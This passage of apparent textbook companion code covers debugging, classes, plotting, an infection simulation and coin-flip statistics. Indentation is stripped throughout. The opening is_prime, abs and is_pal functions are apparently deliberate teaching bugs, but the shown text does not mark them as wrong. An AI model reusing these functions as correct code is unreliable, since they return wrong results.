# print(L1)
# # Code from page 152
def is_prime(x):
"""Assumes x is a nonnegative int
Returns True if x is prime; False otherwise"""
if x <= 2:
return False
for i in range(2, x):
if x%i == 0:
return False
return True
# # Code from page 153
def abs(x):
"""Assumes x is an int
Returns x if x>=0 and –x otherwise"""
if x < -1:
return -x
else:
return x
# # Figure 8-3 from page page 161
def is_pal(x):
"""Assumes x is a list
Returns True if the list is a palindrome; False otherwise"""
temp = x
temp.reverse
return temp == x
def silly(n):
"""Assumes n is an int > 0
Gets n inputs from user
Prints 'Yes' if the sequence of inputs forms a palindrome;
'No' otherwise"""
for i in range(n):
result = []
elem = input('Enter element: ')
result.append(elem)
if is_pal(result):
print('Yes')
else:
print('No')
# # Code from page 162
# silly(2)
# # Code from page 163
def silly(n):
"""Assumes n is an int > 0
Gets n inputs from user
Prints 'Yes' if the sequence of inputs forms a palindrome;
'No' otherwise"""
result = []
for i in range(n):
elem = input('Enter element: ')
result.append(elem)
print(result)
if is_pal(result):
print('Yes')
else:
print('No')
# silly(2)
# # Code from page 164
# def is_pal(x):
# """Assumes x is a list
# Returns True if the list is a palindrome; False otherwise"""
# temp = x[:]
# temp.reverse()
# return temp == x
# def silly(n):
# """Assumes n is an int > 0
# Gets n inputs from user
# Prints 'Yes' if the sequence of inputs forms a palindrome;
# 'No' otherwise"""
# result = []
# for i in range(n):
# elem = input('Enter element: ')
# result.append(elem)
# print(result)
# if is_pal(result):
# print('Yes')
# else:
# print('No')
# silly(2)
```
#### File: code/chapter 10/chapter10.py
```python
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def size(self):
return len(self._elems)
# print(type(Toy))
# print(type(Toy.__init__), type(Toy.add), type(Toy.size))
# # Code from page 180
# t1 = Toy()
# print(type(t1))
# print(type(t1.add))
# t2 = Toy()
# print(t1 is t2) #test for object identity
# # Code from page 181
# t1 = Toy()
# t2 = Toy()
# t1.add([3, 4])
# t2.add([4])
# print(t1.size() + t2.size())
# # Figure 10-1 from page 182
class Int_set(object):
"""An Int_set is a set of integers"""
#Information about the implementation (not the abstraction):
#Value of a set is represented by a list of ints, self._vals.
#Each int in a set occurs in self._vals exactly once.
def __init__(self):
"""Create an empty set of integers"""
self._vals = []
def insert(self, e):
"""Assumes e is an integer and inserts e into self"""
if e not in self._vals:
self._vals.append(e)
def member(self, e):
"""Assumes e is an integer
Returns True if e is in self, and False otherwise"""
return e in self._vals
def remove(self, e):
"""Assumes e is an integer and removes e from self
Raises ValueError if e is not in self"""
try:
self._vals.remove(e)
except:
raise ValueError(str(e) + ' not found')
def get_members(self):
"""Returns a list containing the elements of self._
Nothing can be assumed about the order of the elements"""
return self._vals[:]
def union(self, other):
"""other is an Int_set
mutates self so that it contains exactly the elemnts in self
plus the elements in other."""
def __str__(self):
"""Returns a string representation of self"""
if self._vals == []:
return '{}'
self._vals.sort()
result = ''
for e in self._vals:
result = result + str(e) + ','
return f'{{{result[:-1]}}}'
# # Code from page 183
# s = Int_set()
# s.insert(3)
# print(s.member(3))
# # Code from page 184
# s = Int_set()
# s.insert(3)
# s.insert(4)
# print(str(s))
# print('The value of s is', s)
# # Header for finger exercise on page 184
def union(self, other):
"""other is an Int_set
mutates self so that it contains exactly the elemnts in self
plus the elements in other."""
# # Figure 10-2 on page 185
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def __len__(self):
return len(self._elems)
def __add__(self, other):
new_toy = Toy()
new_toy._elems = self._elems + other._elems
return new_toy
def __eq__(self, other):
return self._elems == other._elems
def __str__(self):
return str(self._elems)
def __hash__(self):
return id(self)
# t1 = Toy()
# t2 = Toy()
# t1.add([1, 2])
# t2.add([3, 4])
# t3 = t1 + t2
# print('The value of t3 is', t3)
# print('The length of t3 is', len(t3))
# d = {t1: 'A', t2: 'B'}
# print('The value', d[t1], 'is associated with the key t1 in d.')
# # Import used for class Person
import datetime
# # Figure 10-3 from page 189
class Person(object):
def __init__(self, name):
"""Assumes name a string. Create a person"""
self._name = name
try:
last_blank = name.rindex(' ')
self._last_name = name[last_blank+1:]
except:
self._last_name = name
self.birthday = None
def get_name(self):
"""Returns self's full name"""
return self._name
def get_last_name(self):
"""Returns self's last name"""
return self._last_name
def set_birthday(self, birthdate):
"""Assumes birthdate is of type datetime.date
Sets self's birthday to birthdate"""
self._birthday = birthdate
def get_age(self):
"""Returns self's current age in days"""
if self._birthday == None:
raise ValueError
return (datetime.date.today() - self._birthday).days
def __lt__(self, other):
"""Assume other a Person
Returns True if self precedes other in alphabetical
order, and False otherwise. Comparison is based on last
names, but if these are the same full names are
compared."""
if self._last_name == other._last_name:
return self._name < other._name
return self._last_name < other._last_name
def __str__(self):
"""Returns self's name"""
return self._name
# # Code from page 188
# me = Person('<NAME>')
# him = Person('<NAME>')
# her = Person('Madonna')
# print(him.get_last_name())
# him.set_birthday(datetime.date(1961, 8, 4))
# her.set_birthday(datetime.date(1958, 8, 16))
# print(him.get_name(), 'is', him.get_age(), 'days old')
# # Code from page 190
# p_list = [me, him, her]
# for p in p_list:
# print(p)
# p_list.sort()
# for p in p_list:
# print(p)
# # Figure 10-4 from page 192
class MIT_person(Person):
_next_id_num = 0 #identification number
def __init__(self, name):
super().__init__(name)
self._id_num = MIT_person._next_id_num
MIT_person._next_id_num += 1
def get_id_num(self):
return self._id_num
def __lt__(self, other):
return self._id_num < other._id_num
# # Code from page 192
# p1 = MIT_person('<NAME>')
# print(str(p1) + '\'s id number is ' + str(p1.get_id_num()))
# # Code from page 193
p1 = MIT_person('<NAME>')
p2 = MIT_person('<NAME>')
p3 = MIT_person('<NAME>')
p4 = Person('<NAME>')
# print('p1 < p2 =', p1 < p2)
# print('p3 < p2 =', p3 < p2)
# print('p4 < p1 =', p4 < p1)
# print('p1 < p4 =', p1 < p4)
# Finger exercise from page 194
class Politician(Person):
""" A politician is a person that can belong to a political party"""
def __init__(self, name, party = None):
"""name and party are strings"""
def get_party(self):
"""returns the party to which self belongs"""
def might_agree(self, other):
"""returns True if self and other belong to the same part
or at least one of then does not belong to a party"""
# # Figure 10-5 from page 194
class Student(MIT_person):
pass
class UG(Student):
def __init__(self, name, class_year):
super().__init__(name)
self._year = class_year
def get_class(self):
return self._year
class Grad(Student):
pass
# # Code from page 195
# p5 = Grad('<NAME>')
# p6 = UG('<NAME>', 1984)
# print(p5, 'is a graduate student is', type(p5) == Grad)
# print(p5, 'is an undergraduate student is', type(p5) == UG)
# # Code from page 195 -- Should be added to class MIT_Person
def is_student(self):
return isinstance(self, Student)
# print(p5, 'is a student is', p5.is_student())
# print(p6, 'is a student is', p6.is_student())
# print(p3, 'is a student is', p3.is_student())
# # Code from page 196
class Transfer_student(Student):
def __init__(self, name, from_school):
MIT_person.__init__(self, name)
self._from_school = from_school
def get_old_school(self):
return self._from_school
# # Figure 10-6 from page 198
class Grades(object):
def __init__(self):
"""Create empty grade book"""
self._students = []
self._grades = {}
self._is_sorted = True
def add_student(self, student):
"""Assumes: student is of type Student
Add student to the grade book"""
if student in self._students:
raise ValueError('Duplicate student')
self._students.append(student)
self._grades[student.get_id_num()] = []
self._is_sorted = False
def add_grade(self, student, grade):
"""Assumes: grade is a float
Add grade to the list of grades for student"""
try:
self._grades[student.get_id_num()].append(grade)
except:
raise ValueError('Student not in mapping')
def get_grades(self, student):
"""Return a list of grades for student"""
try:
return self._grades[student.get_id_num()][:]
except:
raise ValueError('Student not in mapping')
def get_students(self):
"""Return a sorted list of the students in the grade book"""
if not self._is_sorted:
self._students.sort()
self._is_sorted = True
return self._students[:]
# def get_students(self): #new version from later in chapter
# """Return the students in the grade book one at a time
# in alphabetical order"""
# if not self._is_sorted:
# self._students.sort()
# self._is_sorted = True
# for s in self._students:
# yield s
# # Code from page 197
# course = Grades()
# course.add_student(Grad('Bernie'))
# all_students = course.get_students()
# all_students.append(Grad('Liz'))
# # Figure 10-7 from page 199
def grade_report(course):
"""Assumes course is of type Grades"""
report = ''
for s in course.get_students():
tot = 0.0
num_grades = 0
for g in course.get_grades(s):
tot += g
num_grades += 1
try:
average = tot/num_grades
report = f"{report}\n{s}'s mean grade is {average}"
except ZeroDivisionError:
report = f"{report}\n{s} has no grades"
return report
# ug1 = UG('<NAME>', 2021)
# ug2 = UG('<NAME>', 2041)
# ug3 = UG('<NAME>', 2003)
# g1 = Grad('<NAME>')
# g2 = Grad('<NAME>')
# six_hundred = Grades()
# six_hundred.add_student(ug1)
# six_hundred.add_student(ug2)
# six_hundred.add_student(g1)
# six_hundred.add_student(g2)
# for s in six_hundred.get_students():
# six_hundred.add_grade(s, 75)
# six_hundred.add_grade(g1, 25)
# six_hundred.add_grade(g2, 100)
# six_hundred.add_student(ug3)
# print(grade_report(six_hundred))
# # Figure 10-8 from page 201
class info_hiding(object):
def __init__(self):
self.visible = 'Look at me'
self.__also_visible__ = 'Look at me too'
self.__invisible = 'Don\'t look at me directly'
def print_visible(self):
print(self.visible)
def print_invisible(self):
print(self.__invisible)
def __print_invisible(self):
print(self.__invisible)
def __print_invisible__(self):
print(self.__invisible)
# # Code from page 201
# test = info_hiding()
# print(test.visible)
# print(test.__also_visible__)
# print(test.__invisible)
# test = info_hiding()
# test.print_invisible()
# test.__print_invisible__()
# test.__print_invisible()
# # Code from page 202
class Sub_class(info_hiding):
def new_print_invisible(self):
print(self.__invisible)
# test_sub = Sub_class()
# test_sub.new_print_invisible()
# # Figure 10-9 from page 204 is embedded as a comment in code for Figue 10-7
# # Code from page 205
# book = Grades()
# book.add_student(Grad('Julie'))
# book.add_student(Grad('Lisa'))
# for s in book.get_students():
# print(s)
# # Finger exercise from page 205
def get_students_above(self, grade):
"""Return the students a mean grade > g one at a time"""
# # Figure 10-10 from page 208
def find_payment(loan, r, m):
"""Assumes: loan and r are floats, m an int
Returns the monthly payment for a mortgage of size
loan at a monthly rate of r for m months"""
return loan*((r*(1+r)**m)/((1+r)**m - 1))
class Mortgage(object):
"""Abstract class for building different kinds of mortgages"""
def __init__(self, loan, ann_rate, months):
"""Assumes: loan and ann_rate are floats, months an int
Creates a new mortgage of size loan, duration months, and
annual rate ann_rate"""
self._loan = loan
self._rate = ann_rate/12
self._months = months
self._paid = [0.0]
self._outstanding = [loan]
self._payment = find_payment(loan, self._rate, months)
self._legend = None #description of mortgage
def make_payment(self):
"""Make a payment"""
self._paid.append(self._payment)
reduction = self._payment - self._outstanding[-1]*self._rate
self._outstanding.append(self._outstanding[-1] - reduction)
def get_total_paid(self):
"""Return the total amount paid so far"""
return sum(self._paid)
def __str__(self):
return self._legend
# Figure 10-11 from page 211
class Fixed(Mortgage):
def __init__(self, loan, r, months):
Mortgage.__init__(self, loan, r, months)
self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
def __init__(self, loan, r, months, pts):
Mortgage.__init__(self, loan, r, months)
self._pts = pts
self._paid = [loan*(pts/100)]
self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
def __init__(self, loan, r, months, teaser_rate, teaser_months):
Mortgage.__init__(self, loan, teaser_rate, months)
self._teaser_months = teaser_months
self._teaser_rate = teaser_rate
self._nextRate = r/12
self._legend = (f'{100*teaser_rate:.1f}% for ' +
f'{self._teaser_months} months, then {100*r:.1f}%')
def make_payment(self):
if len(self._paid) == self._teaser_months + 1:
self._rate = self._nextRate
self._payment = find_payment(self._outstanding[-1],
self._rate,
self._months - self._teaser_months)
Mortgage.make_payment(self)
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
var_rate1, var_rate2, var_months):
tot_months = years*12
fixed1 = Fixed(amt, fixed_rate, tot_months)
fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1,
var_months)
morts = [fixed1, fixed2, two_rate]
for m in range(tot_months):
for mort in morts:
mort.make_payment()
for m in morts:
print(m)
print(f' Total payments = ${m.get_total_paid():,.0f}')
# # Code from page 210
# compare_mortgages(amt=200000, years=30, fixed_rate=0.035,
# pts = 2, pts_rate=0.03, var_rate1=0.03,
# var_rate2=0.05, var_months=60)
```
#### File: code/chapter 13/chapt13.py
```python
import matplotlib.pyplot as plt
import numpy as np
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 20
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 20
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
plt.rcParams['lines.markersize'] = 10
#set number of times marker is shown when displaying legend
plt.rcParams['legend.numpoints'] = 1
#Set size of type in legend
plt.rcParams['legend.fontsize'] = 14
# # Code from page 258
# plt.plot([1,2,3,4], [1,7,3,5]) #draw on current figure
# # Code from page 259
# plt.figure(1) #create figure 1
# plt.plot([1,2,3,4], [1,2,3,4]) #draw on figure 1
# plt.figure(2) #create figure 2
# plt.plot([1,4,2,3], [5,6,7,8]) #draw on figure 2
# plt.savefig('Figure-Addie') #save figure 2
# plt.figure(1) #go back to working on figure 1
# plt.plot([5,6,10,3]) #draw again on figure 1
# plt.savefig('Figure-Jane') #save figure 1
# # Code from page 260
# principal = 10000 #initial investment
# interest_rate = 0.05
# years = 20
# values = []
# for i in range(years + 1):
# values.append(principal)
# principal += principal*interest_rate
# plt.plot(values)
# plt.title('5% Growth, Compounded Annually')
# plt.xlabel('Years of Compounding')
# plt.ylabel('Value of Principal ($)')
# # Code from page 261
# principal = 10000 #initial investment
# interestRate = 0.05
# years = 20
# values = []
# for i in range(years + 1):
# values.append(principal)
# principal += principal*interestRate
# plt.plot(values, '-k', linewidth = 30)
# plt.title('5% Growth, Compounded Annually',
# fontsize = 'xx-large')
# plt.xlabel('Years of Compounding', fontsize = 'x-small')
# plt.ylabel('Value of Principal ($)')
# # The function find_payment is from Figure 10-10
def find_payment(loan, r, m):
"""Assumes: loan and r are floats, m an int
Returns the monthly payment for a mortgage of size
loan at a monthly rate of r for m months"""
return loan*((r*(1+r)**m)/((1+r)**m - 1))
# # Figure 13-7 from page 264
class Mortgage(object):
"""Abstract class for building different kinds of mortgages"""
def __init__(self, loan, annRate, months):
self._loan = loan
self._rate = annRate/12.0
self._months = months
self._paid = [0.0]
self._outstanding = [loan]
self._payment = find_payment(loan, self._rate, months)
self._legend = None #description of mortgage
def make_payment(self):
self._paid.append(self._payment)
reduction = self._payment - self._outstanding[-1]*self._rate
self._outstanding.append(self._outstanding[-1] - reduction)
def get_total_paid(self):
return sum(self._paid)
def __str__(self):
return self._legend
def plot_payments(self, style):
plt.plot(self._paid[1:], style, label = self._legend)
def plot_balance(self, style):
plt.plot(self._outstanding, style, label = self._legend)
def plot_tot_pd(self, style):
tot_pd = [self._paid[0]]
for i in range(1, len(self._paid)):
tot_pd.append(tot_pd[-1] + self._paid[i])
plt.plot(tot_pd, style, label = self._legend)
def plot_net(self, style):
tot_pd = [self._paid[0]]
for i in range(1, len(self._paid)):
tot_pd.append(tot_pd[-1] + self._paid[i])
equity_acquired = np.array([self._loan]*len(self._outstanding))
equity_acquired = equity_acquired-np.array(self._outstanding)
net = np.array(tot_pd) - equity_acquired
plt.plot(net, style, label = self._legend)
# # Code from page 265
# a1 = np.array([1, 2, 4])
# print('a1 =', a1)
# a2 = a1*2
# print('a2 =', a2)
# print('a1 + 3 =', a1 + 3)
# print('3 - a1 =', 3 - a1)
# print('a1 - a2 =', a1 - a2)
# print('a1*a2 =', a1*a2)
# Code from Figure 13-8 on page 267
class Fixed(Mortgage):
def __init__(self, loan, r, months):
Mortgage.__init__(self, loan, r, months)
self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
def __init__(self, loan, r, months, pts):
Mortgage.__init__(self, loan, r, months)
self._pts = pts
self._paid = [loan*(pts/100)]
self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
def __init__(self, loan, r, months, teaser_rate, teaser_months):
Mortgage.__init__(self, loan, teaser_rate, months)
self._teaser_months = teaser_months
self._teaser_rate = teaser_rate
self._nextRate = r/12
self._legend = (f'{100*teaser_rate:.1f}% for ' +
f'{self._teaser_months} months, then {100*r:.1f}%')
def make_payment(self):
if len(self._paid) == self._teaser_months + 1:
self._rate = self._nextRate
self._payment = find_payment(self._outstanding[-1],
self._rate,
self._months - self._teaser_months)
Mortgage.make_payment(self)
# Code from Figure 13-9 on page 268
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
var_rate1, var_rate2, var_months):
tot_months = years*12
fixed1 = Fixed(amt, fixed_rate, tot_months)
fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1, var_months)
morts = [fixed1, fixed2, two_rate]
for m in range(tot_months):
for mort in morts:
mort.make_payment()
plot_mortgages(morts, amt)
# Code from Figure 13-10 on page 269
def plot_mortgages(morts, amt):
def label_plot(figure, title, x_label, y_label):
plt.figure(figure)
plt.title(title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.legend(loc = 'best')
styles = ['k-', 'k-.', 'k:']
#Give names to figure numbers
payments, cost, balance, net_cost = 0, 1, 2, 3
for i in range(len(morts)):
plt.figure(payments)
morts[i].plot_payments(styles[i])
plt.figure(cost)
morts[i].plot_tot_pd(styles[i])
plt.figure(balance)
morts[i].plot_balance(styles[i])
plt.figure(net_cost)
morts[i].plot_net(styles[i])
label_plot(payments, f'Monthly Payments of ${amt:,} Mortages',
'Months', 'Monthly Payments')
label_plot(cost, f'Cash Outlay of ${amt:,} Mortgages',
'Months', 'Total Payments')
label_plot(balance, f'Balance Remaining of ${amt:,} Mortages',
'Months', 'Remaining Loan Balance of $')
label_plot(net_cost, f'Net Cost of ${amt:,} Mortgages',
'Months', 'Payments - Equity $')
# # Code from page 268
# compare_mortgages(amt=200000, years=30, fixed_rate=0.07,
# pts = 3.25, pts_rate=0.05, var_rate1=0.045,
# var_rate2=0.095, var_months=48)
# # Code from Figure 13-14 on page 272
def simulation(fixed, variable):
infected = [fixed['initial_infections']]
new_infections = [fixed['initial_infections']]
total_infections = fixed['initial_infections']
for t in range(fixed['duration']):
cur_infections = infected[-1]
# remove people who are no longer contagious
if len(new_infections) > fixed['days_spreading']:
cur_infections -= new_infections[-fixed['days_spreading']-1]
# if social distancing, change number of daily contacts
if t >= variable['red_start'] and t < variable['red_end']:
daily_contacts = variable['red_daily_contacts']
else:
daily_contacts = fixed['init_contacts']
# compute number of new cases
total_contacts = cur_infections * daily_contacts
susceptible = fixed['pop'] - total_infections
risky_contacts = total_contacts * (susceptible/fixed['pop'])
newly_infected = round(risky_contacts*fixed['contagiousness'])
# update variables
new_infections.append(newly_infected)
total_infections += newly_infected
infected.append(cur_infections + newly_infected)
return infected, total_infections
# # Code from Figure 13-15 on page 273
def plot_infections(infections, total_infections, fixed):
infection_plot = plt.plot(infections, 'r', label = 'Infected')[0]
plt.xticks(fontsize = 'large')
plt.yticks(fontsize = 'large')
plt.xlabel('Days Since First Infection',fontsize = 'xx-large')
plt.ylabel('Number Currently Infected',fontsize = 'xx-large')
plt.title('Number of Infections Assuming No Vaccine\n' +
f'Pop = {fixed["pop"]:,}, ' +
f'Contacts/Day = {fixed["init_contacts"]}, ' +
f'Infectivity = {(100*fixed["contagiousness"]):.1f}%, ' +
f'Days Contagious = {fixed["days_spreading"]}',
fontsize = 'xx-large')
plt.legend(fontsize = 'xx-large')
txt_box = plt.text(plt.xlim()[1]/2, plt.ylim()[1]/1.25,
f'Total Infections = {total_infections:,.0f}',
fontdict = {'size':'xx-large', 'weight':'bold',
'color':'red'})
return infection_plot, txt_box
# # Code from Figure 13-16 on page 274
# fixed = {
# 'pop': 5000000, # population at risk
# 'duration': 500, # number of days for simulation
# 'initial_infections': 4, # initial number of cases
# 'init_contacts': 50, #contacts without social distancing
# 'contagiousness': 0.005, # prob. of getting disease if exposed
# 'days_spreading': 10} # days contagious after infection
# variable = {
# # 'red_daily_contacts': 4, # social distancing
# 'red_daily_contacts': fixed['init_contacts'], # social distancing
# 'red_start': 20, # start of social distancing
# 'red_end': 200} # end of social distancing
# infections, total_infections = simulation(fixed, variable)
# fig = plt.figure(figsize=(12, 8.5))
# plot_infections(infections, total_infections, fixed)
# To use interactive plots, you might might need change your
# Python preferences. Go to preferences->iPythonConsole->graphics.
# Set backend to automatic, and then restart the iPython console
# # Cdpe from page 275
# # Layout for figure
# fig = plt.figure(figsize=(12, 8.5))
# infections_ax = plt.axes([0.12, 0.2, 0.8, 0.65])
# contacts_ax = plt.axes([0.25, 0.09, 0.65, 0.03])
# start_ax = plt.axes([0.25, 0.06, 0.65, 0.03])
# end_ax = plt.axes([0.25, 0.03, 0.65, 0.03])
# # Code from page 276
# # Create the sliders
# from matplotlib.widgets import Slider
# contacts_slider = Slider(
# contacts_ax, # axes object containing the slider
# 'reduced\ncontacts/day', # name of slider
# 0, # minimal value of the parameter
# 50, # maximal value of the parameter
# 50) # initial value of the parameter)
# contacts_slider.label.set_fontsize(12)
# start_day_slider = Slider(start_ax, 'start reduction', 1, 30, 20)
# start_day_slider.label.set_fontsize(12)
# end_day_slider = Slider(end_ax, 'end reduction', 30, 400, 200)
# end_day_slider.label.set_fontsize(12)
# # Define a function that will be executed each time the value
# # indicated by any slider changes.
# def update(fixed, infection_plot, txt_box,
# contacts_slider, start_day_slider, end_day_slider):
# variable = {'red_daily_contacts': contacts_slider.val,
# 'red_start': start_day_slider.val,
# 'red_end': end_day_slider.val}
# I, total_infections = simulation(fixed, variable)
# infection_plot.set_ydata(I) # new y-coordinates for plot
# txt_box.set_text(f'Total Infections = {total_infections:,.0f}')
# # Cdoe from page 277
# slider_update = lambda _: update(fixed, infection_plot, txt_box,
# contacts_slider, start_day_slider,
# end_day_slider)
# contacts_slider.on_changed(slider_update)
# start_day_slider.on_changed(slider_update)
# end_day_slider.on_changed(slider_update)
# infections, total_infections = simulation(fixed, variable)
# plt.axes(infections_ax)
# infection_plot, txt_box = plot_infections(infections,
# total_infections, fixed)
```
#### File: code/chapter 17/chapter17.py
```python
import random
import numpy as np
import matplotlib.pyplot as plt
import scipy.integrate
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 18
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 18
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
plt.rcParams['lines.markersize'] = 10
#set number of times marker is shown when displaying legend
plt.rcParams['legend.numpoints'] = 1
#Set size of type in legend
plt.rcParams['legend.fontsize'] = 14
# # Figure 17-1 from page 344
def roll_die():
"""Returns a random int between 1 and 6"""
return random.choice([1,2,3,4,5,6])
def roll_n(n):
result = ''
for i in range(n):
result = result + str(roll_die())
print(result)
# roll_n(10)
# # Figure 17-2 from page 347
def flip(num_flips):
"""Assumes num_flips a positive int"""
heads = 0
for i in range(num_flips):
if random.choice(('H', 'T')) == 'H':
heads += 1
return heads/num_flips
def flip_sim(num_flips_per_trial, num_trials):
"""Assumes num_flips_per_trial and num_trials positive ints"""
frac_heads = []
for i in range(num_trials):
frac_heads.append(flip(num_flips_per_trial))
mean = sum(frac_heads)/len(frac_heads)
return mean
# # Cdoe from page 347
# random.seed(0)
# print('Mean =', flip_sim(10, 1))
# print('Mean =', flip_sim(10, 1))
# print('Mean =', flip_sim(10, 100))
# print('Mean =', flip_sim(10, 100))
# # Figure 17-3 from page 350
def regress_to_mean(num_flips, num_trials):
#Get fraction of heads for each trial of num_flips
frac_heads = []
for t in range(num_trials):
frac_heads.append(flip(num_flips))
#Find trials with extreme results and for each the next trial
extremes, next_trials = [], []
for i in range(len(frac_heads) - 1):
if frac_heads[i] < 0.33 or frac_heads[i] > 0.66:
extremes.append(frac_heads[i])
next_trials.append(frac_heads[i+1])
#Plot results
plt.plot(range(len(extremes)), extremes, 'ko',
label = 'Extreme')
plt.plot(range(len(next_trials)), next_trials, 'k^',
label = 'Next Trial')
plt.axhline(0.5)
plt.ylim(0, 1)
plt.xlim(-1, len(extremes) + 1)
plt.xlabel('Extreme Example and Next Trial')
plt.ylabel('Fraction Heads')
plt.title('Regression to the Mean')
plt.legend(loc = 'best')
# random.seed(0)
# regress_to_mean(15, 50)
# # Figure 17-5 from page 352
def flip_plot(min_exp, max_exp):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
Plots results of 2**min_exp to 2**max_exp coin flips"""
ratios, diffs, x_axis = [], [], []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
num_heads = 0
for n in range(num_flips):
if random.choice(('H', 'T')) == 'H':
num_heads += 1
num_tails = num_flips - num_heads
try:
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
except ZeroDivisionError:
continue
plt.title('Difference Between Heads and Tails')
plt.xlabel('Number of Flips')
plt.ylabel('Abs(#Heads - #Tails)')
plt.xticks(rotation = 'vertical')
plt.plot(x_axis, diffs, 'k')
plt.figure()
plt.title('Heads/Tails Ratios')
plt.xlabel('Number of Flips')
plt.ylabel('#Heads/#Tails')
plt.xticks(rotation = 'vertical')
plt.plot(x_axis, ratios, 'k')
# random.seed(0)
# flip_plot(4, 20)
# # Figure 17-8 from page 356
def variance(X):
"""Assumes that X is a list of numbers.
Returns the variance of X"""
mean = sum(X)/len(X)
tot = 0.0
for x in X:
tot += (x - mean)**2
return tot/len(X)
def std_dev(X):
"""Assumes that X is a list of numbers.
Returns the standard deviation of X"""
return variance(X)**0.5
# # Figure 17-6 from page 357
def make_plot(x_vals, y_vals, title, x_label, y_label, style,
log_x = False, log_y = False):
plt.figure()
plt.title(title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.plot(x_vals, y_vals, style)
if log_x:
plt.semilogx()
if log_y:
plt.semilogy()
# # Figure 17-10 from page 358
def run_trial(num_flips):
num_heads = 0
for n in range(num_flips):
if random.choice(('H', 'T')) == 'H':
num_heads += 1
num_tails = num_flips - num_heads
return (num_heads, num_tails)
def flip_plot1(min_exp, max_exp, num_trials):
"""Assumes min_exp, max_exp, num_trials ints >0; min_exp < max_exp
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
x_axis = []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
title = f'Mean Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_means, title, 'Number of Flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = f'SD Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
# random.seed(0)
# flip_plot1(4, 20, 20)
# # flip_plot1 with addtion of code from Figure 17-12 on page 360
def flip_plot1(min_exp, max_exp, num_trials):
"""Assumes min_exp, max_exp, num_trials ints >0; min_exp < max_exp
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
x_axis = []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
title = f'Mean Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_means, title, 'Number of Flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = f'SD Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
###Added later in chapter
title = f'Mean abs(#Heads - #Tails) ({num_trials} Trials)'
make_plot(x_axis, diffs_means, title,
'Number of Flips', 'Mean abs(#Heads - #Tails)', 'ko',
log_x = True, log_y = True)
title = f'SD abs(#Heads - #Tails) ({num_trials} Trials)'
make_plot(x_axis, diffs_SDs, title,
'Number of Flips', 'Standard Deviation', 'ko',
log_x = True, log_y = True)
# # Figure 17-14 from page 361
def CV(X):
mean = sum(X)/len(X)
try:
return std_dev(X)/mean
except ZeroDivisionError:
return float('nan')
# # Figure 17-15 from page 362
def flip_plot2(min_exp, max_exp, num_trials):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
num_trials a positive integer
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
ratios_CVs, diffs_CVs, x_axis = [], [], []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/float(num_tails))
